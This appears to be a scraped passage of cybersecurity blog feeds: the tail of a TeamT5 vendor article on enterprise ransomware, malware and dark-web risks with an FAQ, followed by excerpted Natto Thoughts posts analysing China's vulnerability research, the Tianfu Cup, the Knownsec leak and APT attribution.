preventing enterprises from maintaining daily operations, and demands a ransom in exchange for decryption. However, the impact of ransomware attacks goes far beyond simple “data encryption”. Its potential consequences include:</p> <h4>1. Data Encryption and Operational Disruption</h4> <p>Attackers often encrypt critical systems, servers, or endpoints, making it impossible for enterprises to carry out daily operations, deliver services, or access important files. These disruptions can last for days or even weeks.</p> <h4>2. Double Extortion: Data Breach Risk</h4> <p>Current ransomware attacks often employ a “steal first, encrypt later” approach. The leaked data may be publicly disclosed or sold, extending the impact beyond operational disruption to privacy, regulatory compliance, and reputational risks.</p> <h4>3. High Ransom and Subsequent Costs</h4> <p>In addition to potentially hundreds of thousands to millions of dollars in ransom, enterprises must also handle long-term costs such as system rebuilding, compliance requirements, customer notification and remediation, and reputational damage.</p> <h4>4. Attackers May Not Keep Their Promises</h4> <p>Even if the ransom is paid, there is no guarantee that a valid decryption key will be obtained or that the stolen data has been deleted. Enterprises may even face further ransom demands or persistent attacks.</p> <p>Therefore, every enterprise must prepare for prevention, detection, and response early on. It is recommended to deploy an endpoint detection and response (EDR) solution that effectively blocks ransomware, to assist enterprises in timely detection and response.</p> <p>For EDR application scenarios and purchasing guidelines, please refer to: </p> <ul> <li><a href="https://teamt5.org/en/posts/simplify-complex-cybersecurity-smarter-endpoint-monitoring-and-management/?utm_source=blog&amp;utm_medium=website">Simplify Complex Cybersecurity: Smarter Endpoint Monitoring &amp; Management </a></li> <li><a href="https://teamt5.org/en/posts/key-considerations-for-evaluating-endpoint-detection-and-response-edr-solutions/?utm_source=blog&amp;utm_medium=website">Endpoint Detection and Response (EDR) Solution: Key Considerations for Procurement</a></li> </ul> <h2>Malware Risk: Conduct routine system checks and strengthen zero-trust security strategy</h2> <p>Malicious software (also known as malware) takes many forms, including viruses, Trojans, spyware, worms, and keyloggers. Attackers often use social engineering, phishing emails, malicious links, or infected software updates to infiltrate corporate environments. 
Once a breach is successful, malware can cause a variety of serious consequences, such as stealing confidential information, modifying system settings, monitoring user behavior, opening backdoors for subsequent attacks, and even becoming a precursor to ransomware intrusions.</p> <p>For enterprises, the threat of malware is not limited to the technical level; it can also lead to operational disruptions, paralysis of critical systems, leakage of customer data, and damage to reputation. With the widespread availability of attack tools and AI technology, the cost of creating and distributing malware has been significantly reduced, making enterprises of all sizes targets.</p> <p>Only by regularly conducting system health checks and threat hunting—proactively identifying and mitigating potential threats that may bypass general cybersecurity measures—can enterprises effectively reduce the risks posed by malware.</p> <p>Learn how threat hunting defends against malware:</p> <ul> <li><a href="https://teamt5.org/en/posts/what-is-threat-hunting/?utm_source=blog&amp;utm_medium=website">What is Threat Hunting?</a></li> <li><a href="https://teamt5.org/en/posts/5-benefits-of-threat-hunting-strategies-for-enterprises/?utm_source=blog&amp;utm_medium=website">5 Benefits of Threat Hunting Strategies for Enterprises</a></li> <li><a href="https://teamt5.org/en/posts/never-trust-always-verify-how-to-enhance-zero-trust-strategy/">“Never Trust, Always Verify” – How to Enhance Zero-trust Strategy?</a></li> </ul> <h2>Dark Web Risks: Enterprises should monitor for leaked trade secrets and sensitive data</h2> <p>The dark web, hidden from traditional search engines and browsers, is a network frequently used by attackers to exchange attack tools and plan or discuss attack schemes, posing an unprecedented challenge to corporate cybersecurity. 
Enterprises must recognize the potential impact of the dark web and establish corresponding detection and defense measures as early as possible to reduce the risks of data breaches, credential theft, and brand damage.</p> <p>Here are some things you need to know about the dark web:</p> <ul> <li><a href="https://teamt5.org/en/posts/what-is-the-dark-web/?utm_source=blog&amp;utm_medium=website">What is the Dark Web?</a></li> <li><a href="https://teamt5.org/en/posts/the-impact-of-dark-web-on-enterprise-cybersecurity/?utm_source=blog&amp;utm_medium=website">The Impact of Dark Web on Enterprise Cybersecurity</a></li> <li><a href="https://teamt5.org/en/posts/real-cases-of-how-the-dark-web-has-affected-enterprises-and-how-they-could-have-prevented-it/?utm_source=blog&amp;utm_medium=website">Real Cases of How the Dark Web Has Affected Enterprises and How They Could Have Prevented It</a></li> </ul> <h2>Cybercrime Risk: Businesses should track trends and deploy defenses proactively</h2> <p>As enterprises become fully digitized, the internet has become a crucial foundation for daily operations, but it also exposes organizations to more complex and diverse cybercrime threats. From ransomware attacks to data breaches, criminal methods continue to evolve. 
Attackers not only collaborate closely through the dark web and underground forums using a &quot;Cybercrime as a Service&quot; (CaaS) model, but they are also adept at using automated tools and AI technologies to find exploitable vulnerabilities.</p> <p>Enterprises must stay abreast of the dynamics of ransomware groups and underground criminal communities, understanding their attack motives, technological evolution, and activity patterns in order to accurately assess the potential impact of these threats on their operations and take effective defensive measures to strengthen cybersecurity resilience, reduce operational risks, and ensure stable enterprise operations.</p> <p>Here are some things you need to know about cybercrime:</p> <ul> <li><a href="https://teamt5.org/en/posts/what-is-cybercrime-and-how-can-organizations-defend-against-it/?utm_source=blog&amp;utm_medium=website">What Is Cybercrime and How Can Organizations Defend Against It?</a></li> <li><a href="https://teamt5.org/en/posts/threatvision-cybercrime-intelligence-revealing-threats-from-the-hacker-s-perspective/?utm_source=blog&amp;utm_medium=website">ThreatVision Cybercrime Intelligence: Revealing Threats from the Hacker’s Perspective</a></li> <li><a href="https://teamt5.org/en/posts/outpace-ransomware-operators-with-threat-vision-cybercrime-intelligence/?utm_source=blog&amp;utm_medium=website">Outpace Ransomware Operators with ThreatVision Cybercrime Intelligence</a></li> </ul> <br> <p>In the event of various cybersecurity incidents, consider seeking services from expert teams, such as incident response (IR) services. IR can assist enterprises in responding to and investigating cybersecurity incidents in a timely manner to help mitigate damage. 
Their assistance includes, but is not limited to, the following:</p> <ul> <li><a href="https://teamt5.org/en/posts/ir-use-case-how-to-respond-to-ransomware-attack/?utm_source=blog&amp;utm_medium=website">[Incident Response Case] Ransomware encryption comes to your door, how should you respond? </a></li> <li><a href="https://teamt5.org/en/posts/ir-use-case-how-to-respond-to-private-data-breach/?utm_source=blog&amp;utm_medium=website">[Incident Response Case] When personal information is breached and exploited by hackers, how do enterprises deal with it?</a></li> <li><a href="https://teamt5.org/en/posts/ir-use-case-how-to-respond-to-advanced-persistent-threat-apt/?utm_source=blog&amp;utm_medium=website">[Incident Response Case] When APT threats are lurking in the environment, how can you deal with them effectively? </a></li> </ul> <p>However, enterprises need to consider carefully when selecting and procuring cybersecurity incident response services. We provide a <a href="https://teamt5.org/en/posts/key-considerations-for-evaluating-incident-response-service-ir/?utm_source=blog&amp;utm_medium=website">procurement guide</a> outlining five key points to consider.</p> <h2>Conclusion</h2> <p>Because cybersecurity incidents occur so frequently, it’s wise for organizations to work with expert teams to strengthen their defenses. For instance, managed detection and response (MDR) services can significantly improve a company’s security posture by helping identify, analyze, and respond to threats more effectively.</p> <p>Read the following article to learn how businesses can choose MDR services to build comprehensive cybersecurity protection:</p> <ul> <li><a href="https://teamt5.org/en/posts/key-considerations-for-evaluating-managed-detection-and-response-mdr-solution/?utm_source=blog&amp;utm_medium=website">Managed Detection and Response (MDR): Key Considerations for Procurement</a></li> </ul> <blockquote> <p>TeamT5 consists of top cyber threat analysts. Leveraging our geographic and cultural advantages, we have the best understanding of cyber attackers in Asia Pacific. TeamT5 is frequently invited to share insights at top cybersecurity conferences. Our threat intelligence research expertise and solutions were recognized with the 2023-2024 Company of the Year Award in Taiwanese Threat Intelligence by Frost &amp; Sullivan.<br/> Contact us: <a href="https://teamt5.org/en/contact-us/?utm_source=blog&amp;utm_medium=website">link</a></p> </blockquote> <h2>FAQ</h2> <h3>Q: What are the common cybersecurity threats to enterprises in 2026?</h3> <p>A: Common cybersecurity threats include:</p> <ul> <li>Ransomware attacks</li> <li>Malware intrusion</li> <li>Phishing attacks</li> <li>Data breaches</li> </ul> <p>These attack methods are still evolving rapidly in 2026, posing even greater risks.</p> <blockquote> <p>More info: <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=blog&amp;utm_medium=website">[Whitepaper] Seeing the Pattern Behind The Attacks: APAC Intelligence for CISOs Worldwide</a></p> </blockquote> <h3>Q: What is ransomware? How can enterprises prevent attacks and ransomware threats?</h3> <p>A: Ransomware encrypts company data and demands a large ransom, often accompanied by data breaches. 
Enterprises can mitigate this risk through endpoint detection and response (EDR) and vulnerability patching.</p> <blockquote> <p>The award-winning endpoint detection and response solution, ThreatSonar Anti-Ransomware, is your ideal choice. <a href="https://teamt5.org/en/products/threatsonar-anti-ransomware/?utm_source=blog&amp;utm_medium=website">Click to learn more.</a></p> </blockquote> <h3>Q: What is malware? What threats does it pose to enterprises?</h3> <p>A: Malware is one of the most common cybersecurity threats to enterprises, encompassing various forms such as viruses, Trojans, spyware, and keyloggers. Attackers often infiltrate corporate systems through phishing emails, malicious links, or infected files, causing leaks of confidential data, system compromise, or operational disruptions. With the proliferation of attack tools and AI technology, malware is easier to spread. Enterprises must strengthen endpoint protection, conduct continuous monitoring, and enhance employee awareness to mitigate the risks.</p> <blockquote> <p>Understanding how threat hunting can combat malware: <a href="https://teamt5.org/en/posts/5-benefits-of-threat-hunting-strategies-for-enterprises/?utm_source=blog&amp;utm_medium=website">5 Benefits of Threat Hunting Strategies for Enterprises</a></p> </blockquote> <h3>Q: What is the dark web? What threats does it pose to enterprises?</h3> <p>A: The dark web has become a primary channel for attackers to exchange malicious tools, sell leaked data, and plan criminal activities, posing a high level of cybersecurity risk to enterprises. Enterprises must take the potential impact of the dark web seriously and establish monitoring, detection, and protection mechanisms as early as possible to reduce risks such as credential theft, data breaches, and damage to brand reputation.</p> <blockquote> <p>More Information: <a href="https://teamt5.org/en/posts/real-cases-of-how-the-dark-web-has-affected-enterprises-and-how-they-could-have-prevented-it/?utm_source=blog&amp;utm_medium=website">Real Cases of How the Dark Web Has Affected Enterprises and How They Could Have Prevented It</a></p> </blockquote> <h3>Q: What is cybercrime? What threats does it pose to enterprises?</h3> <p>A: Cybercrime refers to illegal activities conducted using computers, the internet, or digital devices. Its targets are wide-ranging, potentially including individuals, enterprises, and even government agencies; the underlying motives are also quite diverse, ranging from financial gain and data theft to espionage and sabotage.</p> <blockquote> <p>More Information: <a href="https://teamt5.org/en/posts/what-is-cybercrime-and-how-can-organizations-defend-against-it/?utm_source=blog&amp;utm_medium=website">What Is Cybercrime and How Can Organizations Defend Against It?</a></p> </blockquote> <h3>Q: What should I do when a cybersecurity incident occurs?</h3> <p>A: After detecting a cybersecurity incident, the enterprise should first classify the incident; then “incident containment” should be implemented to limit the impact of the incident and prevent further escalation. 
Depending on the type and severity of the incident, the following measures can be taken:</p> <ul> <li><strong>Isolate infected systems</strong>: Disconnect infected systems from the network to prevent the spread of malware.</li> <li><strong>Block suspicious traffic</strong>: Use firewalls and intrusion prevention systems (IPS) to block suspicious network traffic.</li> <li><strong>Disable affected services</strong>: Temporarily disable affected applications or services to reduce risk.</li> </ul> <p>Subsequently, the enterprise should conduct incident investigation, recovery, reporting, and analysis to improve its cybersecurity strategies and response plans.</p> <blockquote> <p>For more detailed cybersecurity incident response procedures, please read our article “<a href="https://teamt5.org/en/posts/cybersecurity-incident-response-handling-from-basic-concepts-to-practical-handling/?utm_source=blog&amp;utm_medium=website">Cybersecurity Incident Response: From Basic Concepts to Practice</a>”.</p> </blockquote> <h3>Q: Which cybersecurity solutions should enterprises prioritize for investment in 2026?</h3> <p>A: Suggested priority order: </p> <ul> <li>Threat Intelligence</li> <li>Endpoint Detection and Response (EDR)</li> <li>Threat Hunting Tool</li> </ul> <p>TeamT5 provides all of the above solutions and services. Learn more and contact us for a free trial: <a href="https://teamt5.org/en/posts/intelligence-driven-cyber-defense/?utm_source=blog&amp;utm_medium=website">Solution Introduction</a>.</p>
  18. The Tianfu Cup Returns Under MPS Leadership as AI Takes Center Stage

    Wed, 11 Feb 2026 14:02:47 -0000

    After a two-year hiatus, the Tianfu Cup returns under MPS lead, combining AI-assisted vulnerability discovery and exploitation, a new competition track, and less transparency in vulnerability handling
    <p>The Tianfu Cup (天府杯), China’s premier exploit hacking competition,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> has returned to Chengdu, Sichuan Province, for its sixth edition, held from January 29 to 30, 2026, this time under the organizational lead of China’s Ministry of Public Security (MPS), the country’s domestic law-enforcement authority. Launched in 2018 after Chinese authorities <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/capture-the-red-flag-an-inside-look-into-chinas-hacking-contest-ecosystem/">barred</a> domestic researchers from participating in international exploit competitions, such as Canada’s Pwn2Own, the Tianfu Cup emerged as a domestic alternative for high-end vulnerability research and exploitation.</p><figure><img src="https://substack-post-media.s3.amazonaws.com/public/images/73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png" width="1280" height="555" alt="2026 Tianfu Cup homepage"><figcaption class="image-caption">2026 Tianfu Cup homepage. Screenshot by the Natto Team, taken on January 31, 2026, of the Tianfu Cup 2026 website.</figcaption></figure><p>After skipping three editions in 2022, 2024, and 2025, the competition has now reappeared, although the reasons for this hiatus and revival remain unclear. 
The event was <a href="https://archive.ph/gwwpl">first announced </a>on China’s MPS website on January 16. On January 19, the Tianfu Cup’s account on the social media platform X appears to have briefly posted about the competition before deleting the post shortly thereafter. The following day, the event’s website (hxxps://tianfucup[.]cn) became inaccessible from outside China. By February 2, following the conclusion of the contest, the site appeared to have been taken offline entirely and remains inaccessible as of this writing. The Natto Team was nonetheless able to access the website while researching this piece, which includes screenshots of relevant information, as well as MPS and private company press releases that remain accessible.</p><p>Building on earlier analyses of past Tianfu Cup events by the <a href="https://www.nattothoughts.com/p/tianfu-cup-2023-still-a-thing">Natto Team</a> and the <a href="https://css.ethz.ch/en/center/CSS-news/2024/06/from-vegas-to-chengdu-hacking-contests-bug-bounties-and-chinas-offensive-cyber-ecosystem.html">From Vegas to Chengdu report </a>from the Center for Security Studies at ETH Zurich, this piece examines what has changed with the Tianfu Cup’s return and why it matters. It analyzes the shift from a commercially led competition to one organized almost entirely by the MPS, specifically the Sichuan Provincial Public Security Bureau. It then looks at the structure of the 2026 edition and its two tracks, including evidence of AI-assisted techniques being used in vulnerability discovery and exploitation. Finally, it explores what remains the most consequential and unresolved question: where vulnerabilities discovered at the Tianfu Cup are likely to end up, and what this suggests about China’s evolving approach to vulnerability retention and state control.</p><p><strong>A complete list of competition targets, as disclosed on the 2026 Tianfu Cup website, is reproduced in the appendix at the end of this piece.</strong></p> <p> <a href="https://www.nattothoughts.com/p/the-tianfu-cup-returns-under-mps"> Read more </a> </p>
  19. Provincial Tasking, Cross-Provincial Execution: A Case-Based Look at How China Scales Cyber Operations

    Wed, 28 Jan 2026 15:02:08 -0000

    How decentralized MSS and MPS tasking and market-enabled, cross-provincial execution by commercial firms shape the scale of China&#8217;s cyber operations
    <p>In a previous piece, we<a href="https://nattothoughts.substack.com/p/the-many-arms-of-the-mss-why-provincial"> argued</a> that provincial Ministry of State Security (MSS) bureaus function as key organizational nodes in China’s cyber operations – acting as operational nerve centers with their own internal priorities, resources, and institutional logics.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> But this decentralization does not mean that cyber operations are siloed at the provincial level.</p><p>Disclosures from a 2024 leak, together with a March 2025 U.S. indictment involving Anxun (<a href="https://www.nattothoughts.com/p/i-soon-another-company-in-the-apt41">i-SOON</a>) Information Technology Co., Ltd (安洵信息技术有限公司), which has been linked to Chinese state-sponsored cyber campaigns, <a href="https://www.justice.gov/opa/pr/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global">indicate</a> that a single commercial actor can be tasked by, actively seek contract opportunities from, or perform work for, a large number of provincial MSS and Ministry of Public Security (MPS) bureaus. This case provides rare visibility into how a single firm can support multiple, distinct provincial mandates and supply the operational capacity through which intrusions are carried out at near-national scale.</p><p>Building on this, this piece examines how companies allegedly linked to APT activity – concentrated in a small number of provinces – enable cross-provincial operational scaling, even as provincial bureaus remain the primary source of tasking and authority. It begins by briefly distinguishing legitimate businesses from front companies, then traces how earlier cyber operations were likely predominantly organized around provincially bounded, bureau-executed models centered on front companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> Next, it shows how market maturity enabled greater collaboration between government agencies and legitimate firms, and concludes by examining why these firms are concentrated in a handful of provinces.</p> <p> <a href="https://www.nattothoughts.com/p/provincial-tasking-cross-provincial"> Read more </a> </p>
  20. China’s 2025 Top 20 Cybersecurity Companies: Which “Dark Horses” Will Emerge to Prominence in 2026?

    Wed, 14 Jan 2026 15:03:15 -0000

    Annual ranking reveals hyper-competitive, innovation-focused top performers – some familiar and some not so well known, with extensive government ties
    <p>As we enter 2026, the geopolitical landscape appears more uncertain than ever. Ongoing conflicts, such as the Russia-Ukraine war, remain unresolved, while <a href="https://www.aei.org/articles/bracing-for-china-shock-2-0/">competition</a> among major world powers is intensifying. In such a climate, strength and capability are paramount. China’s cybersecurity industry <a href="https://web.archive.org/web/20251007173305/https:/www.ciids.cn/list_15/5033.html">recognizes</a> its special expertise as “the fundamental cornerstone for safeguarding national security.” Among the more than five thousand cybersecurity companies in China, which ones stand out as top providers of quality products and services, significantly contributing to China’s national security? The “2025 Top 20 Chinese Cybersecurity Enterprises (2025年中国网络安全前二十家企业)” list, featured in the annual “China Internet Company Comprehensive Capability Index (CICCI) (中国互联网企业综合实力指数)” <a href="https://web.archive.org/web/20260108023343/https:/www.isc.org.cn/article/27470949623525376.html">report</a> published at the end of December 2025 by the <a href="https://web.archive.org/web/20250211023130/https:/www.isc.org.cn/article/15315.html">Internet Society of China</a> (ISC), an industry association affiliated with the Chinese Ministry of Industry and Information Technology (MIIT), offers a fresh perspective on the leading players in China’s cybersecurity industry as we begin our 2026 research focused on this sector.</p><p>The Natto Team believes that understanding these Chinese cybersecurity companies is essential for grasping how China develops its cyber capabilities. Since launching Natto Thoughts in 2023, our team has investigated several Chinese cybersecurity companies involved in state-sponsored or state-linked cyber operations. Our <a href="https://nattothoughts.substack.com/p/a-look-back-at-the-top-5-natto-thoughts">findings</a> suggest that China has established a highly effective and state-aligned system, notably integrating the private sector—Chinese cybersecurity companies—in building its cyber capabilities.</p><p>In this post, the Natto Team examines the overall development of China’s cybersecurity sector and the top cybersecurity companies of 2025 based on the ISC’s CICCI reports, which analyze these companies’ key performance indicators, innovation and research and development (R&D) capabilities, business and market coverage, and how their core functions align with China’s national priorities.</p> <p> <a href="https://www.nattothoughts.com/p/chinas-2025-top-20-cybersecurity"> Read more </a> </p>
  21. A Look Back at the Top 5 Natto Thoughts Reports in 2025

    Tue, 06 Jan 2026 15:03:16 -0000

    From attack–defense thinking to vulnerability research and exposed threat actors, we explored key aspects of China’s cyber ecosystem
    <figure><figcaption class="image-caption">Image: a pile of paper with a pen on top of it. Photo by <a href="https://unsplash.com/@jessica45">Jessica G.</a> on <a href="https://unsplash.com">Unsplash</a></figcaption></figure><p>Natto Thoughts had a great year in 2025, experiencing strong growth in both readership and collaboration. The Natto Team would like to thank our readers for making our in-depth explorations of China’s evolving cyber ecosystem our most-viewed reports of the year. Your support drives our research. We also want to thank Eugenio Benincasa and Dakota Cary for their research collaboration efforts. Three of the top five reports resulted from this partnership.</p><p>Collectively, these five reports provide a comprehensive overview of how China has formally institutionalized its cyber capabilities, resulting in a highly effective and state-aligned system—particularly highlighting the integrated role of the private sector.</p><p>Here are the highlights from the top 5 reports:</p><ul><li><p>“<strong><a href="https://nattothoughts.substack.com/p/defense-through-offense-mindset-from">Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China’s Cybersecurity Industry</a></strong>”: This report demonstrated how the guiding philosophy, “To defend, one must first know how to attack” (以攻为防), originated in 1990…</p></li></ul> <p> <a href="https://www.nattothoughts.com/p/a-look-back-at-the-top-5-natto-thoughts"> Read more </a> </p>
  22. The Many Arms of the MSS: Why Provincial Bureaus Matter in China’s Cyber Operations

    Tue, 16 Dec 2025 17:01:34 -0000

    Provincial bureaus of the Chinese Ministry of State Security likely operate with their own tasking priorities, resources, and local ecosystems for cyber operations
    <p>To defend systems, one must first pinpoint the source of malicious activity. Most cyber threat intelligence (CTI) firms focus on tactical and operational attribution: tactical attribution identifies and clusters technical details such as malware used, attack methods, or indicators of compromise, while operational attribution uses characteristics of activity clusters to infer group profiles and assigns labels like “APT” or “UNC.”<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> Strategic attribution goes further by identifying the real-world individuals or entities behind an intrusion.</p><p>Some CTI experts <a href="https://www.robertmlee.org/the-problems-with-seeking-and-avoiding-true-attribution-to-cyber-attacks/">debate</a> the conditions under which strategic attribution is appropriate, while others <a href="https://www.uclalawreview.org/wp-content/uploads/securepdfs/2020/09/Eichensehr-67-3.pdf">highlight</a> the technical challenges of identifying threat actors, the political motivations behind public disclosure, and the legal standards required to assign responsibility. The Natto Team and <a href="https://www.amazon.com/Attribution-Advanced-Persistent-Threats-cyber-espionage/dp/3662613123">other</a> researchers believe that – compared to “cluster-based” tactical and operational attribution – the strategic identification of real-world individuals and o…</p> <p> <a href="https://www.nattothoughts.com/p/the-many-arms-of-the-mss-why-provincial"> Read more </a> </p>
  23. Knownsec: The King of Vulnerability Missed Three Vulnerabilities of Its Own

    Wed, 03 Dec 2025 17:02:43 -0000

    The leak incident involving Chinese cybersecurity firm Knownsec shows the company’s seemingly transparent crisis management strategy and underscores its position in the industry, but mysteries remain.
    <p>On November 5, 2025, a Chinese-language blog called <a href="https://archive.li/NNsWb#selection-347.3-347.169">Mrxn’s Blog</a> published a “massive” leak of information from Knownsec (知道创宇), a Chinese cybersecurity company. Mrxn claimed that the leak included 12,000 confidential documents, such as “China’s state-level cyber weapons, internal tool systems, and global target lists.” The blog provided sample screenshots of the leak and noted that the leaked information first appeared on the code-sharing platform GitHub, which subsequently removed it “for violating its terms of service.” The <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a> Substack was among the first outlets to report in English on Mrxn’s blog post about the leak. <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a>’s author, a freelance journalist based in Amsterdam, The Netherlands, provided a summary and analysis of the limited available leaked documents—including screenshots of product brochures, data collection lists, and a Knownsec company profile—and concluded there was no “smoking gun” or evidence of state-of-the-art tools used by Chinese state hackers. H…</p> <p> <a href="https://www.nattothoughts.com/p/knownsec-the-king-of-vulnerability"> Read more </a> </p>
  24. China’s Cybersecurity Companies Advancing Offensive Cyber Capabilities Through Attack-Defense Labs

    Wed, 19 Nov 2025 17:03:09 -0000

    Private-sector attack-defense labs form a core pillar of how China builds, sustains, and operationalizes cyber capability for commercial purposes and state-linked cyber operations.
    <p>Western governments are grappling with how private-sector offensive cyber capabilities should fit into state operations. This raises a number of practical <a href="https://www.govtech.com/blogs/lohrmann-on-cybersecurity/cyber-privateers-the-return-of-the-hack-back-debate">questions</a>: If a state tasked a company with carrying out cyber operations against an adversary, who inside those organizations would actually carry out offensive work?<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> How would these units be structured for government tasks? And how would offensive activity coexist with a company’s day-to-day R&D and commercial operations?</p><p>In China, these questions are far less abstract. Private companies have been core contributors to national cyber capability building for years, supported by both policy and institutional design. They develop many of the tools, techniques, and forms of expertise that underpin defensive security products and can also be leveraged for state-sponsored cyber operations. The clearest organizational expression of this approach is companies’ widespread use of <strong>attack-defense labs (攻防实验室)</strong>, internal units that merge defensiv…</p> <p> <a href="https://www.nattothoughts.com/p/chinas-cybersecurity-companies-advancing"> Read more </a> </p>
  25. A Researcher Came Knocking, and Taught China a Lesson in How to Manage Vulnerabilities -- and Researchers

    Wed, 05 Nov 2025 17:02:57 -0000

    A TCL TV vulnerability disclosure drove home the message: to protect its economic and political clout, China must heed global vulnerability researchers' warnings and cultivate Chinese researchers
    <p>In the last few days of October 2025 in Asia, <a href="https://www.youtube.com/watch?v=6wU7nfqJ2SI">gift-giving</a> between top political leaders has drawn a lot of attention—and <a href="https://www.youtube.com/watch?v=1KdW6wjfTCY&amp;t=56s">laughter</a>. One moment, which surprised many of us, was when Chinese President Xi Jinping showed humor during his gift exchange with South Korean President Lee Jae Myung. It is rare to see a Chinese leader “<a href="https://www.nytimes.com/2025/11/02/world/asia/xi-jinping-china-south-korea-spying.html">speaking off the cuff in public</a>.” On this occasion, President Xi joked about backdoors in cellphones—yes, <a href="https://csrc.nist.gov/glossary/term/backdoor">backdoors</a> that can monitor or access the information in mobile devices.</p><p>During his first <a href="https://web.archive.org/web/20251104150038/https:/www.fmprc.gov.cn/eng/xw/zyxw/202511/t20251101_11745458.html">state visit</a> to South Korea in 11 years, Xi presented two Chinese-made Xiaomi brand smartphones—Xiaomi being the world’s <a href="https://counterpointresearch.com/en/insights/global-smartphone-share">third-largest</a> smartphone brand—to South Korean President Lee Jae Myung. When Lee asked delightedly about the quality of communication and the security of the phone, Xi smiled and said, “You can check if there is a backdoor.”</p><p>President Xi is undoubtedly fully aware that the United States and its allies have warned that Chinese technology may contain <a href="https://selectcommitteeontheccp.house.gov/media/press-releases/gallagher-urges-us-navy-exchange-remove-ccp-linked-computers-stores">backdoors</a>—what the …</p> <p> <a href="https://www.nattothoughts.com/p/what-a-narrative-control-failure"> Read more </a> </p>
  26. Beyond the Aliases: Decoding Chinese Threat Group Attribution and the Human Factor

    Wed, 22 Oct 2025 16:02:27 -0000

    Examining the overlap between APT27, HAFNIUM, and Silk Typhoon through recent U.S. government disclosures, and why understanding the humans behind the keyboard is important for cyber defenders
    <p>Since March 2025, the U.S. government has exposed Chinese hackers and entities linked to threat groups publicly tracked as <strong>APT27</strong>, <strong>HAFNIUM</strong>, <strong>Silk Typhoon</strong>, and other threat group monikers. For these named Advanced Persistent Threat (APT) groups, technical analysis and observed intrusion activity from the cybersecurity community have provided group tracking criteria and measures to mitigate harm and to eradicate malware from systems and networks. Because cybersecurity firms often use different threat models, have their own standards for clustering intrusions, and closely guard their <a href="https://www.proofpoint.com/us/threat-reference/telemetry">telemetry data</a>—often not sharing with others—we see threat groups labeled with a number of “a.k.a.” (also known as) group names. For example, the <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/apt27">profile of APT27</a> on Malpedia, a community-curated online malware encyclopedia and resource, lists 16 a.k.a. group names. How do these a.k.a. groups overlap? How are they different from one another? The answers are not always clear.</p><p>Additionally, when law enforceme…</p> <p> <a href="https://www.nattothoughts.com/p/beyond-the-aliases-decoding-chinese"> Read more </a> </p>
  27. China’s Vulnerability Research: What’s Different Now?

    Wed, 08 Oct 2025 16:02:33 -0000

    China’s bug-hunting scene is maturing - more players, bigger prizes, tighter structure, and a growing focus on domestic products, driven by profit, prestige, and national security.
    <p>Over the past two decades, China’s vulnerability research ecosystem has undergone a dramatic transformation. <a href="https://nattothoughts.substack.com/p/no-ranges-no-bounties-no-contests">In the early 2000s</a>, it was a fragmented landscape of free databases and easily accessible, low-cost exploits. Over time, it evolved toward commercialization, with organized vulnerability markets and institutional research labs emerging within major tech and cybersecurity companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> By the mid-2010s, Chinese hackers were <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/cyber-report-2024-from-vegas-to-chengdu.pdf">competing – and excelling –</a> in global exploit hacking contests<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> and bug bounty programs<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a> to identify weak spots in Western products.</p><p>As this ecosystem has evolved, the Chinese state has moved to harness vulnerability research for national priorities through both formal and informal channels. From the <strong>top down</strong>, it imposed institutional mechanisms such as direct oversight of researchers and regulations that mandate or incentivize reporting to state-run entities. From the <strong>bottom up</strong>, informal networks among prominent researchers, who exchange insights and acquisition o…</p> <p> <a href="https://www.nattothoughts.com/p/chinas-vulnerability-research-whats"> Read more </a> </p>
  28. Who is Salt Typhoon Really? Unraveling the Attribution Challenge

    Wed, 24 Sep 2025 16:08:09 -0000

    How overlapping APT groups and Chinese companies complicate attribution in state cyber operations
    <p>Our <a href="https://nattothoughts.substack.com/p/salt-typhoon-new-joint-advisory-offers">previous post</a> about Salt Typhoon provided an initial commentary on the <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Joint Cybersecurity Advisory</a> on Salt Typhoon issued on August 27, 2025. The advisory identified three Chinese companies - <strong><a href="https://nattothoughts.substack.com/i/155370638/sichuan-juxinhes-area-of-focus-communication-system-services-aligns-with-salt-typhoon-targeting">Sichuan Juxinhe Network Technology Co. Ltd</a></strong>. (&#22235;&#24029;&#32858;&#20449;&#21644;&#32593;&#32476;&#31185;&#25216;&#26377;&#38480;&#20844;&#21496;), <strong><a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">Beijing Huanyu Tianqiong Information Technology Co., Ltd</a></strong><a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">.</a> (&#21271;&#20140;&#23536;&#23431;&#22825;&#31353;&#20449;&#24687;&#25216;&#26415;&#26377;&#38480;&#20844;&#21496;), and <strong><a href="https://nattothoughts.substack.com/i/173242203/sichuan-zhixin-ruijie-as-a-real-business-lacking-a-company-webpage-but-engaged-in-dedicated-contract-work">Sichuan Zhixin Ruijie Network Technology Co., Ltd</a>.</strong> 